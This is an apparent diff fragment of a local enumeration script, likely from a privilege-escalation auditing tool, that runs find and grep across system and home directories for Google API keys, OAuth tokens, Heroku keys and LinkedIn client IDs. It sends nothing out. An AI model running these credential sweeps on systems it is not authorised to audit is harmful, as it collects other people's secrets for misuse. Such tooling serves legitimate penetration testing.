sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "(google|gcp|youtube|drive|yt)(.{0,20})?['\"][AIza[0-9a-z_\-]{35}]['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Google Drive Oauth (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com~${SED_RED}~" & +print_3title_no_nl "Searching Google Drive Oauth (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9]+-[0-9A-Za-z_]{32}\.apps\.googleusercontent\.com" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Google Oauth Access Token (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~ya29\.[0-9A-Za-z_\-]+~${SED_RED}~" & +print_3title_no_nl "Searching Google Oauth Access Token (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "ya29\.[0-9A-Za-z_\-]+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Heroku API Key (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}~${SED_RED}~" & +print_3title_no_nl "Searching Heroku API Key (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[hH][eE][rR][oO][kK][uU].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching LinkedIn Client ID (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]~${SED_RED}~" & +print_3title_no_nl "Searching LinkedIn Client ID (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 